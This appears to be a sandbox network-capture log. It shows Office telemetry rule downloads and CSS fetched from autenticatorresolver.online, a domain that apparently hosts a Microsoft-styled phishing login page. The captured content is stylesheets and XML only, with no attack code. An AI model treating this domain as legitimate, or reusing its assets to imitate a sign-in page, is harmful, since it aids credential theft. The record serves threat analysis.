2024-11-26 12:43:35 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:34 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124334Z-174f7845968qj8jrhC1EWRh41s0000000va000000000at1y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:35 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:34 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:35 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:34 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124334Z-174f7845968n2hr8hC1EWR9cag0000000v10000000009fq9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:35 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:34 UTC	593	OUT	GET /assets/global/pdf/css/app.css HTTP/1.1 Host: autenticatorresolver.online Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://autenticatorresolver.online/fl/m6kgte57 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-26 12:43:35 UTC	955	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:35 GMT Content-Type: text/css Transfer-Encoding: chunked Connection: close Cache-Control: public, max-age=604800 expires: Mon, 02 Dec 2024 07:33:34 GMT etag: W/"17e2-66d40740-10b4bb;br" last-modified: Sun, 01 Sep 2024 06:18:40 GMT vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 CF-Cache-Status: HIT Age: 105001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9YNfinMQrgnoUjoKl5bCpdeYLs0P%2FtztacJ0UAORO1y8tOPU%2FKQOdsy09WQrcOUjkRdq4svWIJyZRfSDR9vpT4ijAZtCIBj%2BqxXVaDIr2RMKZw3i1SH0S0m7KLY76HmiOBQWfcPHM3Z8eBcKJ74%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e89f708ba908c6c-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1945&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2871&recv_bytes=1171&delivery_rate=1517671&cwnd=168&unsent_bytes=0&cid=56123feee606e78c&ts=457&x=0"
2024-11-26 12:43:35 UTC	414	IN	Data Raw: 31 37 65 32 0d 0a 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 62 6f 64 79 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 22 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 52 6f 62 6f 74 6f 2c 45 62 72 69 6d 61 2c 22 4e 69 72 6d 61 6c 61 20 55 49 22 2c 47 61 64 75 67 69 2c 22 53 65 67 6f 65 20 58 62 6f 78 20 53 79 6d 62 6f 6c 22 2c 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 22 4d 65 69 72 79 6f 20 55 49 22 2c 22 4b 68 6d 65 72 20 55 49 22 2c 54 75 6e 67 61 2c 22 4c 61 6f 20 55 49 22 2c 52 61 61 76 69 2c 22 49 73 6b 6f 6f 6c 61 20 50 6f 74 61 22 2c 4c 61 Data Ascii: 17e2 *{box-sizing:border-box}body{font-weight:400;font-family:"Segoe UI",-apple-system,"Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",La
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f 6c 69 61 6e 20 42 61 69 74 69 22 2c 22 4d 56 20 42 6f 6c 69 22 2c 22 4d 79 61 6e 6d 61 72 20 54 65 78 74 22 2c 22 43 61 6d 62 72 69 61 20 4d 61 74 68 22 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 35 35 2c 32 35 35 2c 32 35 35 29 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 Data Ascii: ","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";font-size:0.9375rem;line-height:1.25rem;margin:0px;background-color:rgb(255,255,255)}button,input{font-weight:inherit;font-family:inherit;font-size:inherit
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 65 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 7d 2e 66 31 31 71 6d 67 75 76 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 7d 2e 66 31 75 69 6e 66 6f 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 36 70 78 7d 2e 66 31 6a 6c 68 73 6d 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 7d 2e 66 31 39 66 34 74 77 76 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 70 78 7d 2e 66 31 68 75 33 70 71 36 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 7d 2e 66 31 37 6d 63 63 6c 61 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 31 39 64 6f 67 38 61 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 7d 2e 66 32 31 63 63 62 74 3e 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 31 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 66 Data Ascii: e{margin-left:0px}.f11qmguv{margin-right:0px}.f1uinfot{margin-top:16px}.f1jlhsmd{margin-bottom:12px}.f19f4twv{margin-bottom:0px}.f1hu3pq6{margin-top:0px}.f17mccla{text-align:center}.f19dog8a{position:fixed}.f21ccbt>div:nth-child(1){display:inline-block}.f
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 66 31 70 68 6b 69 34 33 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 7d 2e 66 31 62 73 6a 72 6d 33 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 66 31 6d 68 34 37 7a 68 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 33 70 78 7d 2e 66 38 32 69 74 61 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 32 70 78 7d 2e 66 31 32 6b 6c 74 73 6e 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 66 38 78 6c 7a 36 67 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 7d 2e 66 31 63 6d 62 75 77 6a 7b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 7d 2e 66 31 39 70 68 38 38 62 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 66 33 72 6d 74 76 61 7b Data Ascii: margin-left:8px}.f1phki43{margin-right:8px}.f1bsjrm3{text-decoration:none}.f1mh47zh{letter-spacing:3px}.f82itaf{line-height:22px}.f12kltsn{vertical-align:top}.f8xlz6g{line-height:24px}.f1cmbuwj{text-overflow:ellipsis}.f19ph88b{min-height:inherit}.f3rmtva{
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 74 6f 6d 3a 36 70 78 7d 2e 66 73 63 33 6d 76 6f 20 69 6e 70 75 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 70 78 7d 2e 66 31 73 36 36 72 74 30 20 69 6e 70 75 74 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 72 67 62 28 35 30 2c 35 30 2c 35 30 29 7d 2e 66 37 33 75 67 7a 31 20 69 6e 70 75 74 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 72 67 62 28 35 30 2c 35 30 2c 35 30 29 7d 2e 66 35 69 76 33 37 30 20 69 6e 70 75 74 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 72 67 62 28 35 30 2c 35 30 2c 35 30 29 7d 2e 66 31 69 77 38 76 76 35 20 69 6e 70 75 74 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 72 67 62 28 35 30 2c 35 30 2c 35 30 29 Data Ascii: tom:6px}.fsc3mvo input{padding-left:0px}.f1s66rt0 input:hover{border-top-color:rgb(50,50,50)}.f73ugz1 input:hover{border-right-color:rgb(50,50,50)}.f5iv370 input:hover{border-left-color:rgb(50,50,50)}.f1iw8vv5 input:hover{border-bottom-color:rgb(50,50,50)
2024-11-26 12:43:35 UTC	232	IN	Data Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 30 2c 31 30 33 2c 31 38 34 29 7d 2e 66 39 65 78 37 35 37 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 72 67 62 28 30 2c 31 30 33 2c 31 38 34 29 7d 2e 66 31 62 6e 37 71 62 79 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 72 67 62 28 30 2c 31 30 33 2c 31 38 34 29 7d 2e 66 71 76 38 39 35 62 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 72 67 62 28 30 2c 31 30 33 2c 31 38 34 29 7d 2e 66 31 79 78 35 39 37 36 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 72 67 62 28 30 2c 31 30 33 2c 31 38 34 29 7d 2e 66 31 69 72 65 74 77 38 7b 63 6f 6c 6f 72 3a 72 67 62 28 32 35 35 2c 32 35 35 2c 32 35 35 29 7d 0d 0a Data Ascii: und-color:rgb(0,103,184)}.f9ex757{border-top-color:rgb(0,103,184)}.f1bn7qby{border-right-color:rgb(0,103,184)}.fqv895b{border-left-color:rgb(0,103,184)}.f1yx5976{border-bottom-color:rgb(0,103,184)}.f1iretw8{color:rgb(255,255,255)}
2024-11-26 12:43:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:34 UTC	594	OUT	GET /assets/global/pdf/css/conf.css HTTP/1.1 Host: autenticatorresolver.online Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://autenticatorresolver.online/fl/m6kgte57 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-26 12:43:35 UTC	958	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:35 GMT Content-Type: text/css Transfer-Encoding: chunked Connection: close Cache-Control: public, max-age=604800 expires: Mon, 02 Dec 2024 07:33:34 GMT etag: W/"5a2-66d40740-10b4ba;br" last-modified: Sun, 01 Sep 2024 06:18:40 GMT vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 CF-Cache-Status: HIT Age: 105001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxXPR4GIHGfJaZ%2FQiQQcZk%2FUgCpwU87V7RD0uwSCR3s9RGbu0OFw5kN2lofwiYCnXoAMhI7jfc1ecMird2qdPkfxCJ2l5fQ03nKkunUWkxilYtmsVSHB%2F6v2Vm7EtcfDIDOTsRdzlL7%2FnmR0%2Fqk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e89f708eac98c6c-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1996&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2872&recv_bytes=1172&delivery_rate=1437715&cwnd=168&unsent_bytes=0&cid=b76d08f56f001931&ts=461&x=0"
2024-11-26 12:43:35 UTC	411	IN	Data Raw: 35 61 32 0d 0a 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 31 74 32 73 71 78 6b 7b 30 25 7b 6c 65 66 74 3a 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 7d 31 30 30 25 7b 6c 65 66 74 3a 2d 32 30 30 70 78 3b 6f 70 61 63 69 74 79 3a 30 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 31 6f 34 74 61 61 78 7b 30 25 7b 72 69 67 68 74 3a 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 7d 31 30 30 25 7b 72 69 67 68 74 3a 2d 32 30 30 70 78 3b 6f 70 61 63 69 74 79 3a 30 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 31 74 32 73 71 78 6b 7b 30 25 7b 6c 65 66 74 3a 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 7d 31 30 30 25 7b 6c 65 66 74 3a 2d 32 30 30 70 78 3b 6f 70 61 63 69 74 79 3a 30 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 31 6f 34 74 61 61 78 7b 30 25 Data Ascii: 5a2@-webkit-keyframes f1t2sqxk{0%{left:0px;opacity:1}100%{left:-200px;opacity:0}}@-webkit-keyframes f1o4taax{0%{right:0px;opacity:1}100%{right:-200px;opacity:0}}@keyframes f1t2sqxk{0%{left:0px;opacity:1}100%{left:-200px;opacity:0}}@keyframes f1o4taax{0%
2024-11-26 12:43:35 UTC	1038	IN	Data Raw: 72 69 67 68 74 3a 32 30 30 70 78 3b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 72 69 67 68 74 3a 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 72 32 65 32 69 76 7b 30 25 7b 6c 65 66 74 3a 32 30 30 70 78 3b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 6c 65 66 74 3a 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 70 67 72 70 7b 30 25 7b 72 69 67 68 74 3a 32 30 30 70 78 3b 6f 70 61 63 69 74 79 3a 30 7d 31 30 30 25 7b 72 69 67 68 74 3a 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 31 77 6a 39 34 72 6c 7b 30 25 7b 6c 65 66 74 3a 30 70 78 3b 6f 70 61 63 69 74 79 3a 31 7d 31 30 30 25 7b 6c 65 66 74 3a 32 30 30 70 78 3b 6f 70 61 Data Ascii: right:200px;opacity:0}100%{right:0px;opacity:1}}@keyframes fr2e2iv{0%{left:200px;opacity:0}100%{left:0px;opacity:1}}@keyframes fadpgrp{0%{right:200px;opacity:0}100%{right:0px;opacity:1}}@-webkit-keyframes f1wj94rl{0%{left:0px;opacity:1}100%{left:200px;opa
2024-11-26 12:43:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:35 UTC	594	OUT	GET /assets/global/pdf/css/conn.css HTTP/1.1 Host: autenticatorresolver.online Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://autenticatorresolver.online/fl/m6kgte57 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-26 12:43:35 UTC	959	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:35 GMT Content-Type: text/css Transfer-Encoding: chunked Connection: close Cache-Control: public, max-age=604800 expires: Mon, 02 Dec 2024 07:33:34 GMT etag: W/"338e-66d40740-10b4b9;br" last-modified: Sun, 01 Sep 2024 06:18:40 GMT vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 CF-Cache-Status: HIT Age: 105001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BjZ73Y8AjLES5VrSmbJYVYD9YxMFgciD5ekSe%2FbyGpW2xbtdYeKdC%2BssrEJ83%2BxyjSv8ssP9zunC7lkMX9ANUECSEI4f94ZIOA7ZoW4VTeaWdhrrCDRJ0xP0sYS0hMcE%2BNBeOfZFI5JPYaVhfs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e89f709ab808c6c-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1948&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2872&recv_bytes=1172&delivery_rate=1498973&cwnd=168&unsent_bytes=0&cid=4cb7a3ca5e9f110a&ts=477&x=0"
2024-11-26 12:43:35 UTC	410	IN	Data Raw: 33 33 38 65 0d 0a 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 2e 66 31 68 69 68 79 70 77 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 2e 66 31 68 64 78 70 6e 32 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 34 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 Data Ascii: 338e @media screen and (max-width:600px),screen and (max-height:366px){.f1hihypw{vertical-align:top}}@media screen and (max-width:600px),screen and (max-height:366px){.f1hdxpn2{padding-top:24px}}@media screen and (max-width:600px),screen and (max
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 2d 62 6f 74 74 6f 6d 3a 32 34 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 2e 66 31 62 30 39 6b 37 72 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 34 70 78 7d 2e 66 69 70 64 70 68 6f 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 34 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 2e 66 31 73 77 31 35 67 73 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 Data Ascii: -bottom:24px}}@media screen and (max-width:600px),screen and (max-height:366px){.f1b09k7r{padding-left:24px}.fipdpho{padding-right:24px}}@media screen and (max-width:600px),screen and (max-height:366px){.f1sw15gs{margin-top:0px}}@media screen and (max-wid
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 74 74 6f 6d 3a 30 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 Data Ascii: ttom:0px}}@media screen and (max-width:600px),screen and (max-height:366px){}@media screen and (max-width:600px),screen and (max-height:366px){}@media screen and (max-width:600px),screen and (max-height:366px){}@media screen and (max-width:600px),screen a
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 29 7b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 2e 66 79 72 6c 65 38 6a 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 35 35 2c 32 35 35 2c 32 35 35 29 7d 7d 40 6d 65 64 69 61 20 73 Data Ascii: ){}@media screen and (max-width:600px),screen and (max-height:366px){}@media screen and (max-width:600px),screen and (max-height:366px){}@media screen and (max-width:600px),screen and (max-height:366px){.fyrle8j{background-color:rgb(255,255,255)}}@media s
2024-11-26 12:43:35 UTC	1369	IN	Data Raw: 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 33 36 36 70 78 29 7b 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 Data Ascii: 